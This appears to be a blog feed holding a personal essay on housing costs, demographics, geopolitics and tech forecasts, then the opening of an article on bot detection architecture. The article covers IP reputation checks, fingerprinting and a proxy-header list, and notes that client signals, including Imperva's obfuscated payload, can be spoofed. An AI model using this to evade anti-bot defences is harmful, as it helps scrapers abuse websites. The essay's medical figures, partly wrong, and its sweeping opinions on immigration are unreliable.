<p>Work won't make you rich. Working merely prevents you from immediate death by starvation and exposure to the elements, but not anything else. In many parts of the Western World, a 40 hour minimum wage job doesn't even give you enough money to rent a one bed room apartment. So those jobs are designed to be done by people that don't have to pay rent, or if they have to, they will need to work 3 of those minimum-wage jobs just to have a roof over the head. It's utter madness.</p>
<p>If you want to become wealthy in the 21st century, you have to do one of the following:</p>
<ol>
<li>Be already wealthy</li>
<li>Inherit wealth</li>
<li>Be extremely smart/talented AND lucky and become rich by yourself with start-up ideas, art, music, sports, fashion, ...</li>
</ol>
<p>For example, If you own real estate and stocks, your assets have more than doubled in the past couple of years. For Millenials such as me, even though I have a relatively good job, it's utterly impossible to buy a normal house. A normal house costs 700.000 EUR where I live (Cologne / Germany). Those exact houses did cost 200.000 EUR ten years ago. How are you supposed to compete with those rising prices? All you can do as a person in that situation is to hope for an economic crash like the one from 2009.</p>
<p><a href="https://old.reddit.com/r/wallstreetbets/comments/q0omot/mortgage_payments_havent_been_this_unaffordable/hfa6mxy/">I_love_boobs86</a> writes on <a href="https://old.reddit.com/r/wallstreetbets/comments/q0omot/mortgage_payments_havent_been_this_unaffordable/hfa6mxy/">r/wallstreetbets</a>:</p>
<blockquote>
<p>35 year old Los Angeles resident here, I just barely squeaked in on a $790k house in 2019 and I was only able to get it because I was the first one there and put in an offer quickly (the seller’s agent and seller had a falling out so no other buyers were considered). </p>
<p>I’m still renovating it, house is and was a complete disaster. I’ve had to redo the entire house from the roof all the way down to the plumbing and everything in between. $100k+ deep now and still going. My mortgage payment is $3,600/month all in but I have a tenant that gives me $1,500 rent so that helps. Even in these two years, I can sell this house for $1.3m easy. It’s fucking madness out there.</p>
</blockquote>
<p>For example, I am currently 30 years old and if I want to buy a normal house for 700.000 EUR, I will need to work for 60 years as of now. I will have cleared my debt at the ripe age of 90 years old. And that's not going to happen.</p>
<p>Sure, some people did risk it and bought those houses with a little down-payment and a huge mortgage and ended up with a houses that doubled in price in the past 3-5 years, but for me, it does not make sense to get massively into debt for a house that increased massively in price. Of course, the interest rates are extremely low right now and the inflation relatively high, so future debt is worth much less. But I am still hesitant. </p>
<p>I mean just have a look on the house price index in Germany:</p>
<figure>
<img src="https://incolumitas.com/images/germany-housing-index.png" alt="housePrice" />
<figcaption>Housing Prices <span style="font-size: 60%">(Source: <a href="https://tradingeconomics.com/germany/housing-index">https://tradingeconomics.com/germany/housing-index</a>)</span></figcaption>
</figure>
<p>Does this look normal to you? The prices are increasing more and more.</p>
<p>As of now, my only strategy that I came up with is to move away from Germany and move to a place with cheaper rent and lower taxes such as Eastern Europe / Turkey / South America / South East Asia. I can always come back to Germany (or other parts of the Western World) when the baby-boomers start to die off (which will start to accelerate in the late 2020s and early 2030s). </p>
<p>Of course I could also relocate to a more affordable region in the German East or countryside in order to save rent costs. But honestly, the German countryside does feel more alien to me than a city such as Bangkok or Buenos Aires.</p>
<p>Of course, when I move to more affordable regions in the world and I keep working remotely for companies in the rich West & North, I will be responsible for prices going up for locals. So instead of me getting fucked over in Germany, I will be the one that fucks over the local people. But in this capitalistic hell hole of an planet, that's all you can do anyhow.</p>
<p>There seems to be a general trend in the world: </p>
<p>Everything that has tangible value, such as real estate and stocks, will increase in price. There is a massive fight for resources. Nobody wants to save money, because inflation burns money at an alarming pace.</p>
<p>Another major shift that we are going to see in the next 50 years is the massive aging of our planet. For example, Europe is already an extremely old continent age-wise. The median age in Western Europe is 44 years in 2020, the median age in Africa is 19.7 years! Germany is the second oldest country in the world with a median age of 47.1 years right behind Japan with 47.3 years.</p>
<figure>
<img src="https://incolumitas.com/images/Europe_population_over_65.png" alt="housePrice" />
<figcaption>Percentage of the European Population above 65 years of age.
<span style="font-size: 60%">(Source: <a href="https://commons.wikimedia.org/wiki/File:Europe_population_over_65.png">https://commons.wikimedia.org/wiki/File:Europe_population_over_65.png</a>)</span>
</figcaption>
</figure>
<p>This unstoppable aging of Europe will require massive immigration from young people from other parts of the world to uphold the economic growth and prosperity. And this will likely lead to conflicts within the respective societies.</p>
<p>For example in Germany, there was </p>
<ul>
<li>6 labourers per retiree in the year 1962</li>
<li>2.7 labourers per retiree in the year 1992</li>
<li>2.1 labourers per retiree in the year 2019</li>
</ul>
<p>And this will become much less in the years to come, because the baby boomer generation will completely retire until 2030.</p>
<figure>
<img src="https://incolumitas.com/images/alterspyramide.png" alt="altersPyramide" />
<figcaption>Germany is an old country.
<span style="font-size: 60%">(Source: <a href="https://service.destatis.de/bevoelkerungspyramide/index.html#!y=2021">https://service.destatis.de/bevoelkerungspyramide/index.html#!y=2021</a>)</span>
</figcaption>
</figure>
<p>On the other hand, in a <a href="https://www.bbsr.bund.de/BBSR/DE/startseite/topmeldungen/bevoelkerungsprognose-bbsr-2040.html">most recent prognosis by the German federal institute of housing & room planning</a>, Germany will not lose any population until 2040 and will remain stagnant at around 82 million people until 2040. This is only possible with <a href="https://www.spiegel.de/panorama/gesellschaft/deutschland-bevoelkerung-schrumpft-in-den-naechsten-jahren-aber-nicht-ueberall-a-4f5a7009-9c23-4a0b-9671-48e82defe0b0">massive immigration</a>. In Germany, between the years 2018 and 2040, Germany is predicted to have 17.4 million births and 23.5 millionen deaths on the other side. So there will come at least 6 million people to Germany in the next 20 years. And those migrants won't come from Europe, because every West European country has the same structural aging issues as Germany, so the migrants will most likely come from Africa, the Middle East and to a lesser extent from the Far East.</p>
<p>Replacing <em>native</em> people with migrants is a massively flawed logic in my opinion. The question that needs to be asked is: Why does the German population not have kids anymore? But the federal Government just doesn't care and proceeds to blindly import new people into this misery. The economy is supposed to grow, but endless growth is utterly insane. The falling birth rates in the whole world are already a sign of the massive scarcity of resources that we have on this planet. It would be a blessing if Germany would lose those 6 million people until the year 2040, as it was predicted based on birth rates alone.</p>
<p>But no, the Government had to lure in more workers so the blessed economy does not tank. The logic is: Work, work, work, don't have children, import young workers from outside of Europe that are working hard for no pay. </p>
<p>Personal anecdote and maybe slightly one-sided: During my time in Bonn, I met many hard working students from India that were studying at the excellent University of Bonn. Those folks were 23 years old and already starting their PhD in machine learning. But not a single person from that calibre planned to stay in Germany, they exclusively wanted to get the cheap and relatively good German education and then relocate to the UK, Australia or USA to work hard for 3 to 5 years in order to go back to India and found a family and build a home. Smart and hardworking people do not go to Germany. The wages are relatively low, and if you manage to earn 10.000 EUR a month, taxes and health insurance will reduce your net salary to 5000 EUR.</p>
<p>Everyone talks about this, but it has to be said again: We will have immense troubles obtaining skilled and smart workers from overseas. Or let me rephrase that: We will have massive problems obtaining skilled workers that want to work for low pay.</p>
<h2>Geopolitics & War</h2>
<p>Probably the most remarkable event in the past months was the chaotic retreat of the Western alliance from Afghanistan. NATO forces were 20 years in this extremely poor country and spend billions of Dollars to arm the Afghan army for nothing. The Afghan army succumbed in a matter of days to the Taliban. There was nothing but corruption in the Afghan army.</p>
<p>I am not so interested in the specific case of Afghanistan (Rule: Never invade Afghanistan, <a href="https://en.wikipedia.org/wiki/First_Anglo-Afghan_War">ask the Englishmen</a>), I want to discuss what can be concluded in general by this milestone event.</p>
<p>US and NATO interventions are a thing of the past. The US won the cold war and intervened with boots on the ground in many countries during that time (Somalia, Iraq, Afghanistan, Kuwait, Haiti, ...), but the war in Afghanistan was probably the last such extensive ground operation. The US will still defend it's allies such as Taiwan, but pro-active wars like that in Afghanistan are very unlikely to happen in the next 10 years and beyond that.</p>
<p>China did not even try to hide that they were <a href="https://www.nytimes.com/2021/07/28/world/asia/china-taliban-afghanistan.html">talking with the Taliban even before the US retreat</a>. China will gradually take over the majority of economic relations in many countries that were depended on the western world until most recently. For the most part, the western world was not feared because of their military capabilities, but because of the necessity to cooperate economically with Europe & North America. China & Russia constitutes an alternative economical hemisphere to the western world. The promise that China gives to countries such as Iran, Afghanistan or many African countries is the following:</p>
<blockquote>
<p>"We do not care about your political issues and how you rule your country. We respect your internal affairs. All we want is to create a win-win situation by trading with you and investing in your country. China want's to interact economically with you, we don't have an interest to export our ideology and try to change your ethno-cultural system."</p>
</blockquote>
<p>If this promise turns out to be true, needs to be seen in the future.</p>
<p>My assumption is that the world becomes more multi-polar. Whereas it could seem like the world is divided between Europe/US/Oceania/Japan on the one side and between China/Russia on the other side, that classification is way too simple. On the long run, Europe and the United States will lose influence compared to the rest of the world. But not because of a sudden collapse, simply because other nations are picking up in economic prosperity.</p>
<p>In 2050, the US and Europe will stay play an important role in the globe, but there will be several more or less equal counterparts, such as China, India, Indonesia, Brazil and some parts of Africa.</p>
<p>I don't think that we will see huge geopolitical shifts in the future. China and India simply want to prosper economically, there is no need to risk it all by invading Taiwan for example. The US will be gradually pushed back in the Pacific Ocean (Especially in the East and South China Sea), but this just seems to be the natural corrective.</p>
<p>Europe continues to lose influence and the internal weakness of Europe will continue to manifest itself as it did when the second largest economy of Europe, the United Kingdom, left the alliance. There is a possibility that <a href="https://www.france24.com/en/europe/20210715-on-the-road-to-polexit-poland-pushes-back-in-battle-against-eu-rule">Poland</a> and <a href="https://www.dw.com/en/hungary-vs-eu-is-orban-striving-for-huxit/a-58934527">Hungary</a> will leave next. Turkey will never enter the European Union in the first place.</p>
<p>But do I see any possibility that our current world in 2021 is headed into a major war, such as a third world war?</p>
<p>No, not really. Not at all actually. The only possibility I see is a major conflict between China and the USA, but China will not risk too much, since their only goal is to increase their wealth and living standard even more. </p>
<p>What about North Korea? I don't think either. North Korea has the bomb since 10 years, nothing has happened so far. In 2019, US President Trump managed to step foot on North-Korean territory and shook hands with Kim Jong-un, the pinnacle of a series of <a href="https://en.wikipedia.org/wiki/Kim_Jong-un#Diplomacy_2018%E2%80%932019">favourable diplomatic events</a> between South Korea, North Korea and the US. To be honest, I wouldn't be surprised to see Korea united again until the year 2050.</p>
<h2>Advance of Medicine & Technology</h2>
<p>I am a computer scientist and thus my viewpoint might be a bit uneducated, buy I don't think that we will see major technological milestones in the next 10-20 years. With major technological leaps, I mean things such as:</p>
<p>Technological breakthroughs</p>
<ol>
<li>General Artificial Intelligence and <a href="https://en.wikipedia.org/wiki/Technological_singularity">Singularity</a> as a result</li>
<li>Fusion reactors that are economical and don't produce radioactive waste</li>
<li>Quantum computers that can reduce the time complexity for real world algorithmic problems such as integer factorization used in the asymmetric cryptosystem RSA (Shor's algorithm). Another application is unstructured search where the task is to find a marked item out of a list of <code>n</code> items in a database (Grover's algorithm).</li>
</ol>
<p>Medical discoveries / breakthroughs</p>
<ol>
<li>Vastly reducing or entirely stopping the natural aging process</li>
<li>Curing chronic diseases such as cancer, cardiovascular diseases and diabetes (of which the prior discovery is a superset)</li>
<li>Curing and reversing neurological damage after incidents such as strokes, accidents or traumata to the head</li>
<li>Making effective use of genetic engineering technology such as CRISPR gene editing</li>
</ol>
<p>Sure, there are some cool things that are happening recently in medicine or will most likely happen in the soon future such as </p>
<ol>
<li>
<p>Hepatitis B and Hepatitis C are almost <a href="https://www.medicinenet.com/can_hep_c_be_cured_completely/article.htm">completely curable</a>. We developed anti retroviral medication that can eradicate Hepatitis C: <em>The "direct-acting" antiviral medications are given over 12 weeks. These are combination medications and will cure early acute hepatitis C in more than 90 percent of people. They are Harvoni (combination of ledipasvir and sofosbuvir) and Viekira Pak (a mix of ombitasvir, paritaprevir, ritonavir and dasabuvir)</em></p>
</li>
<li>
<p>HIV might become curable in the next 10 years. Biontech and Moderna launched several <a href="https://clinicaltrials.gov/ct2/show/NCT05001373">phase 1 trials</a> for mRNA vaccines against HIV. But it has to be said that phase 1 vaccination trials merely means: <em>Phase 1, Randomized, First-in-human, Open-label Study to Evaluate the Safety and Immunogenicity of eOD-GT8 60mer mRNA Vaccine (mRNA-1644) and Core-g28v2 60mer mRNA Vaccine (mRNA-1644v2-Core) in HIV-1 Uninfected Adults in Good General Health.</em> Put differently: They first want to see if the vaccine doesn't harm HIV <strong>uninfected</strong> individuals and generates the desired immune response, before they look if the vaccine effectively prevents HIV infection in the future.</p>
</li>
<li>
<p>mRNA vaccines against Cancer. For example, stage 3 and stage 4 Melanoma, a highly lethal skin cancer in very late stages had a <a href="https://www.nature.com/articles/d41586-020-01038-9">survival rate of 6 to 7 months in the year 2000</a>. Nowadays, in the year 2021, with the the help of immunotherapy and targeted therapy such as checkpoint inhibitors, the same late stage malicious cancer has a 5-year survival rate between <a href="https://www.curemelanoma.org/about-melanoma/melanoma-staging/melanoma-survival-rates/">22.5% (stage 3) - 63% (stage 4)</a>. That is a huge leap in a quick time.</p>
</li>
</ol>
<p>So yes, we will definitely see improvements in treatments for cancer and cardiovascular diseases. However, the very best thing that you can do is to eat healthy, sleep healthy and go to medical checkups once every year.</p>
<p>A human life spans roughly 70 to 80 years and your best years will be between the age of 20 to 60, the future isn't going to change much there.</p>
<p>Regarding consumer technological advancement, I think we reached the peak. In 2007, the iPhone was invented and thus a huge revolution happened that lead to almost every human owning a small personal computer with all of their information in their pocket. What else is there to come?</p>
<p>I reasonably cannot see any further major technological development that would reach that kind of adoption. Sure, smartphones will get smaller and more powerful, but in the year 2050 we will still have smartphones that we carry in our pocket. They will be lighter, foldable and maybe have some kind of technology to display information in a different format than a screen. But we still need to carry some kind of device with us with CPU, RAM and a networking card.</p>
<p>Cars might become entirely electric, maybe even airplanes. Self driving cars might become a reality on certain roads such as standardized highways, where the traffic can be controlled effectively.</p>On the Architecture of Bot Detection Services2021-07-18T22:58:00+02:002021-07-18T22:58:00+02:00Nikolai Tschachertag:incolumitas.com,2021-07-18:/2021/07/18/on-the-architecture-of-bot-detection-services/<p>There are unique challenges when developing a passive bot detecting system. In this blog article, I explain some of the obstacles that need to be overcome in order to detect advanced bots without presenting a CAPTCHA. I also explain how bot programmers can benefit from the architectural challenges that bot detection systems inherently suffer from.</p><h2>Introduction</h2>
<p>Without ever having developed a fully functional anti bot system myself, I want to investigate some of the obstacles that need to be overcome if I started such a project.</p>
<p>First of all, I have to define the functional specification that such an anti bot system must meet: </p>
<blockquote>
<p>A bot detection system should be able to detect passively (1) that a website visitor (2) is in fact not a human but an automated program (3)</p>
</blockquote>
<p>I deliberately keep my definition very broad.</p>
<ol>
<li>An <strong>automated program</strong> is software not controlled by an human user. Some examples:<ul>
<li>The Google Chrome browser automated with a framework such as <a href="https://github.com/microsoft/playwright">playwright</a> or <a href="https://github.com/puppeteer/puppeteer">puppeteer</a></li>
<li>Simple <code>curl</code> commands orchestrated with shell scripts</li>
<li>Real physical mobile phones running Android automated over <code>adb</code> (Android Debug Bridge) and (optionally) controlled with frameworks such as <a href="https://appium.io/">appium.io</a> or <a href="https://github.com/DeviceFarmer/stf">stf (DeviceFarmer)</a></li>
</ul>
</li>
<li>Likewise, <strong>detecting passively</strong> means: Without actively interrupting the user's (or bot's) browser session by asking to solve a challenge task such as Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> or the newer <a href="https://www.hcaptcha.com/">hCAPTCHA</a>.
Put differently: The decision whether a website visitor is a human or a bot has to be made by passively observing signals such as TCP/IP streams and other data sent from the browser via JavaScript.</li>
<li>And what means <strong>website visitor</strong>?
There is a fundamental difference between a website visitor that simply opens a single page before leaving again and a user that performs a complex action such as logging into an online bank and transferring money. In the latter case, a bot detection system has much more time in order to detect a bot. Furthermore, in the latter case, there is also behavioral and intent data, which is completely lacking in the former case.</li>
</ol>
<p>Our attacker model is as follows:</p>
<figure>
<img src="https://incolumitas.com/images/attackerModel.png" alt="attacker model" />
<figcaption>Attacker model of any bot detection service. The red arrows indicate network messages that possibly contain tainted/spoofed data.</figcaption>
</figure>
<p>Some explanatory words regarding the graphic above:</p>
<p>Websites are served by web servers. Every message that the browser (client) sends to the web server has to be considered as potentially spoofed and tainted. This includes network messages created by JavaScript that are dynamically sent over WebSockets or the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">sendBeacon API</a>. This is also the reason why in the traffic arrows from the browser to the web server are in red color.</p>
<p>A fundamental property of client/server security is: All input from clients cannot be trusted from the standpoint of the server. This will be important in the remainder of this blog post, that's why I repeat it so vehemently here.</p>
<p>So what are actually some methods to passively detect that a browser is not controlled by an organic human?</p>
<p>Actually there rarely exist signals that fall into that exact binary category of: This visitor is a bot or not. </p>
<p>Rather, anti bot vendors rephrase the question to: On what level can we uniquely identify a browser user and then rate limit her? Because that's <strong>the overall goal of anti bot systems: Rate limiting unique users</strong>.</p>
<p>Some techniques to identify users:</p>
<ul>
<li>By IP address</li>
<li>By <a href="https://tlsfingerprint.io/">TLS</a> or <a href="https://github.com/NikolaiT/zardaxt">TCP/IP fingerprint</a></li>
<li>By HTTP headers and their order/case sensitivity</li>
<li>By browser fingerprints obtained via JavaScript (Including WebGL fingerprints, audio fingerprints, <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Picasso</a>)</li>
<li>By Cookies/Session ids</li>
</ul>
<p>It should be obvious that the examples from the list above fall into two categories:</p>
<ol>
<li>Signals that are unspoofable due to the design of the Internet, such as IP addresses</li>
<li>Data that clients send to the server, usually via JavaScript, which can be altered by clients at will</li>
</ol>
<p>Of course an attacker can alter her IP address by setting up a proxy server. </p>
<p>Technically, spoofing IP addresses on a IP level will work, but the first router outside your home network will most likely drop the IP packet if it detects that the source IP does not belong to the correct network. And even if that does not happen: How are you ever going to receive a reply to your spoofed IP packet?</p>
<p>With TLS and TCP/IP fingerprinting, it's way easier to spoof those signals on the client side.</p>
<p>On the other hand, all the data that is collected via JavaScript can be spoofed by the client! Usually, anti bot companies collect a wide range of different data with JavaScript:</p>
<ol>
<li>Fingerprinting data mostly from the <code>navigator</code> property</li>
<li>Behavioral data such as mouse movements and touch events or key presses</li>
<li>WebGL fingerprints or audio fingerprints</li>
</ol>
<h2>Architecture of Bot Detection Services</h2>
<p>Let's think about how bot detection services are implemented by following a typical browsing session of a user visiting a website. As discussed above, bot detection systems collect data from both the client side and the server side. In the following section, I will follow a typical browsing session on a very low level and I will explain the different checks that a bot detection system performs at each point along the way.</p>
<p>The very first event relevant for bot detection is the DNS lookup of the hostname to which a browser establishes a connection. The browser uses the operating systems local DNS resolver to lookup the <code>A</code> and <code>AAAA</code> DNS resource record of a hostname. Worded differently, it asks for the IPv4 or IPv6 address that corresponds to the hostname used in the URL that was entered in the browser's address bar. The DNS request will be answered by the responsible name server.</p>
<p>During such a lookup, the DNS server can check that the resolvers client's IP address is the same or belongs to the same ISP as the IP address that communicates with the web server. Put differently, on the DNS server it can be checked that no <a href="https://en.wikipedia.org/wiki/DNS_leak">DNS leak</a> happens. A DNS leak occurs, if the DNS traffic is not routed through the proxy/VPN configured in the browser.</p>
<p>After the IP address of the domain name has been obtained, the browser is ready to establish a connection with the web server.</p>
<p>Before a browser is able to display anything, a TCP and TLS handshake has to occur to establish a TCP connection to the web server (In case we are using a https connection, which almost always is the case nowadays).</p>
<figure>
<img src="https://incolumitas.com/images/tslHandshake.svg" alt="TCP and TLS handshake" />
<figcaption>Before the index.html file is downloaded, a TCP and TLS handshake has to happen.<span style="font-size: 70%">(Source: https://hpbn.co/building-blocks-of-tcp/)</span></figcaption>
</figure>
<p>As soon as the first incoming SYN packet arrives on the web server, an anti bot system is capable of performing the following lookups on the server side:</p>
<ol>
<li>
<p>Obtain the source IP address of the client. As soon as we have the source IP address, we can do a wide range of <strong>IP reputation checks</strong>:</p>
<ul>
<li>IP address counter: Check if we already have received too many requests from this specific IP address in a certain time frame. Abort the TCP handshake by sending a RST packet if that's the case.</li>
<li>Also increase the counter for the specific (assumed) subnet to which this IP address belongs. Many attackers are in possession of whole IPv4 and IPv6 subnets to which this IP address belongs, this fact needs to be addressed.</li>
<li>Lookup the IP address on spam abuse databases such as <a href="https://www.spamhaus.org/">spamhaus.org</a>. Are there any databases that indicate that this IP address was used for spamming/botting purposes?</li>
<li>Conduct a <a href="https://incolumitas.com/pages/Datacenter-IP-API/">datacenter IP lookup</a> for the IP address. If the IP address belongs to a datacenter, it's more likely that it's a bot compared to a residential IP address. Similarly, you can also check if an IP address belongs to a large residential ISP such as Comcast, AT&T or Deutsche Telekom.</li>
<li>Look up the geographical location for this IP address. Is it a tier 1 country (rich countries in the west such as the United Kingdom or Switzerland)? Or is the country known for spamming/botting (Ukraine, Vietnam, Russia - nothing personal here)?</li>
<li>Look up the ASN, organization or registry to which the IP address belongs. This can be done using the <code>whois</code> command. For example, <code>whois 15.23.65.22</code>.</li>
<li>Use IP address metadata services such as <a href="https://ipinfo.io/">ipinfo.io</a> or <a href="https://ip-api.com/">https://ip-api.com/</a> to infer more metadata for this IP address.</li>
<li>Make a reverse lookup for an IP address with the <code>host</code> command. Example: <code>host 80.185.115.25</code>. If the hostname belongs to a trustworthy company, give it a better reputation. If it belongs to a untrustworthy organization, block it.</li>
</ul>
</li>
<li>
<p>Generate a <a href="https://github.com/NikolaiT/zardaxt/">TCP/IP fingerprint</a> from the SYN packet. A TCP/IP fingerprint gives us information about the assumed operating system of the client based on certain TCP and IP header fields/values such as TCP options header field. The TCP/IP fingerprint alone does not have enough entropy to reasonably exclude a client. However, when the inferred OS seems to be Linux system, then it's valid to raise the bot score, since most legit users do not use Linux. The TCP/IP fingerprint can be altered and spoofed by the client!</p>
</li>
<li>Measure TCP/IP latencies and the RTT's of the exchanged packages. What's the throughput? Can we infer that the client used a WiFi network?</li>
</ol>
<p>After the initial TCP/IP handshake is completed, the TLS handshake comes next. After the TLS handshake is completed, the server is able to compute a <a href="https://www.net.in.tum.de/fileadmin/TUM/NET/NET-2020-04-1/NET-2020-04-1_04.pdf">TLS handshake fingerprint</a>.</p>
<p>I am not a specialist regarding TLS fingerprinting, but my guess is that a TLS fingerprint has slightly more entropy compared to a TCP/IP fingerprint and allows to differentiate between different TLS implementations and maybe operating systems. If that is the case, then at this point it would be already possible to see if there is a mismatch in TCP/IP fingerprint OS and TLS fingerprint OS. However, keep in mind that TLS and TCP/IP fingerprints can easily be forged on the client side.</p>
<p>After the TLS handshake has been established, the client sends an initial HTTP GET request to fetch the requested URL. Let's assume the client requests the <code>index.html</code> document. Based on this very first GET request, we can do a couple of things:</p>
<ul>
<li>Compute a HTTP fingerprint. What headers are sent with the client? In what order are they sent? Are the headers case sensitive? </li>
<li>Do the HTTP headers contain typical proxy headers such as </li>
</ul>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">proxy_headers</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Forwarded'</span><span class="p">,</span> <span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'X-Forwarded-For'</span><span class="p">,</span> <span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'X-Requested-With'</span><span class="p">,</span> <span class="s1">'From'</span><span class="p">,</span>
<span class="s1">'X-Real-Ip'</span><span class="p">,</span> <span class="s1">'Via'</span><span class="p">,</span> <span class="s1">'True-Client-Ip'</span><span class="p">,</span> <span class="s1">'Proxy_Connection'</span><span class="p">];</span>
</code></pre></div>
<ul>
<li>Does the HTTP Referer look suspicious?</li>
<li>Is the HTTP version not from a modern browser but from a non-browser library such as <code>curl</code> or Python <code>requests</code>?</li>
</ul>
<p>If all checks pass until this point, the web server is going to serve the contents of the <code>index.html</code> document. After the <code>index.html</code> document has been downloaded, the browser parses the page and loads linked images, CSS and JavaScript files.</p>
<p>The executed JavaScript in turn dynamically fetches more content which results in more HTTP requests, WebSocket streams and other forms of networking requests.</p>
<p>At this point, the anti bot detection system is ready to serve it's JavaScript client library that collects signals from the browser side.</p>
<h2>Bot Detection Techniques on the Client Side with JavaScript</h2>
<p>As soon as JavaScript is executed on the browser, there are a lot of different techniques to harvest data that help to make a decision whether the client is a bot or not.</p>
<p>Keep in mind that the JavaScript execution environment is controlled by the client! So is the data that is sent back to the web server!</p>
<p>Bot detection companies use many different techniques to camouflage their JavaScript signals collection libraries:</p>
<ol>
<li><a href="https://antoinevastel.com/javascript/2019/09/09/improving-obfuscator.html">JavaScript obfuscation</a></li>
<li>JavaScript virtual machines</li>
<li>Encryption and encoding of payloads sent back to the server (only makes sense in combination with obfuscation/virtual machines)</li>
</ol>
<p>Those three obfuscation techniques remind me a bit of the old days of reverse engineering. However, it's much much harder to protect JavaScript code than to protect x86 assembly.</p>
<p>There are some reasons for that:</p>
<ul>
<li>JavaScript is a interpreted high level language</li>
<li>Obfuscated JavaScript must conform to the ECMAScript specification</li>
<li>Obfuscated JavaScript will at some point also be in AST (Abstract Syntax Tree) representation </li>
<li>The obfuscated JavaScript must be supported by many browsers and needs to be performant</li>
</ul>
<p>A well known JavaScript obfuscation tool is <a href="https://github.com/javascript-obfuscator/javascript-obfuscator">javascript-obfuscator</a>. A good JavaScript de-obfuscation tool is <a href="https://github.com/lelinhtinh/de4js">de4js</a>.</p>
<h4>Quick Interlude</h4>
<p>For example, when I look for apartments on the German real estate search engine <a href="https://www.immobilienscout24.de/">immobilienscout24.de</a>, I am sometimes presented a bot detection challenge that performs a check passively in the background.</p>
<p>This is the <a href="https://incolumitas.com/data/imperva.js">heavily obfuscated JavaScript file</a> that does the bot detection work in the background. I spent around 30 minutes trying to understand what it does, but honestly I could not figure out much without spending more time. I only know that the script performs some checks and sends the following payload back to the server, where <code>p</code> is a 30KB long base64 encoded binary blob:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"solution"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"interrogation"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"p"</span><span class="p">:</span><span class="s2">"h6R2UwMDY2NnRfZ18oNUBwVTJKVWtNZnFqc2ZndX5NaHZyOGpf...[truncated]"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"st"</span><span class="p">:</span><span class="mi">1626613924</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sr"</span><span class="p">:</span><span class="mi">113884550</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"cr"</span><span class="p">:</span><span class="mi">994722218</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="s2">"stable"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"old_token"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"error"</span><span class="p">:</span><span class="kc">null</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"performance"</span><span class="p">:{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"interrogation"</span><span class="p">:</span><span class="mi">1006</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The next steps in reverse engineering would be to find out what exactly <code>p</code> contains. Look at the place in the obfuscated JavaScript where <code>p</code> becomes encrypted/encoded and dump the clear text contents. Then I know what data is sent and I can therefore spoof it.</p>
<p>I am heavily assuming that the <a href="https://incolumitas.com/data/imperva.js">above JavaScript</a> is <a href="https://www.imperva.com/products/advanced-bot-protection-management/">Imperva's</a> bot detection client side solution.</p>
<hr>
<p>Before I dive deeper into some of the JavaScript bot detection techniques, I want to explain why collecting signals passively with JavaScript and stopping bots is so difficult. Assuming the bot detection execution time for the script is 200ms and then the data is transmitted in 50ms to the web server, which in turn has to make an API request to the central bot detection API (again 50ms), 300ms already passed before the client can be banned.</p>
<p>This means that all signals recorded by JavaScript that are sent to the bot detection API incur a large delay before a decision can be made on the server side.</p>
<p>This is also the reason why many bot detection companies decide upfront to interrupt the browsing session of the user and display a message that an active bot detection check is happening. <a href="https://www.cloudflare.com/products/bot-management/">Cloudflare Bot Management</a> does this for example.</p>
<p>However, in this blog article I focus on passive detection without interrupting the user's workflow.</p>
<p>What if our goal is to only scrape a single page? Then an attacker can simply abort the execution of said script. Maybe the server then remembers: Hey, this specific client with IP XYZ never actually sent a JavaScript payload back home. Looks unusual: One of the following cases had to happen:</p>
<ol>
<li>There was a network outage</li>
<li>The user navigated away before the JavaScript payload could be sent home</li>
<li>The system / browser crashed</li>
<li>The user blocked the execution of the script deliberately to evade bot detection</li>
</ol>
<p>Only the last point indicates malicious behavior of the client. Therefore, every bot detection system needs to give each client some free attempts, let's say the IP address get blocked if a threshold of <code>N=20</code> has surpassed.</p>
<p>But what if the user switches his IP address between requests? For example by using a mobile 4G or 5G proxy that sits between a <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">Carrier-grade NAT</a>?</p>
<p>You can't just block a whole mobile address range because you feel like it. Wikipedia says:</p>
<blockquote>
<p>In cases of banning traffic based on IP addresses, the system might block the traffic of a spamming user by banning the user's IP address. If that user happens to be behind carrier-grade NAT, other users sharing the same public address with the spammer will be mistakenly blocked. This can create serious problems for forum and wiki administrators attempting to address disruptive actions from a single user sharing an IP address with legitimate users.</p>
</blockquote>
<p>What I describe above is something <strong>very fundamental</strong> about bot detection systems: <strong>They must provide basic functionality without relying on JavaScript signals</strong>. Not only because every network message originating from the client is potentially spoofed, but also because some browsers simply cannot execute JavaScript or fail in the process of doing so! Some users don't have JavaScript enabled. Banning the IP address only because the client disabled JavaScript is too aggressive.</p>
<p>And there is another very important point here: <strong>Bot detection systems can only reliably ban clients by IP address!</strong> This is so important to understand. Every other signal from the client can be spoofed (if the client understands what he executes on his machine)! </p>
<p>If a bot detection system bans based on other ways of identification (Browser fingerprint, WebGL fingerprint, font fingerprint, TLS Fingerprint, TCP/IP fingerprint, ...), a client can change those fingerprints and evade a ban!</p>
<p>Having said that, let's look at some techniques to detect bots on the client side:</p>
<ol>
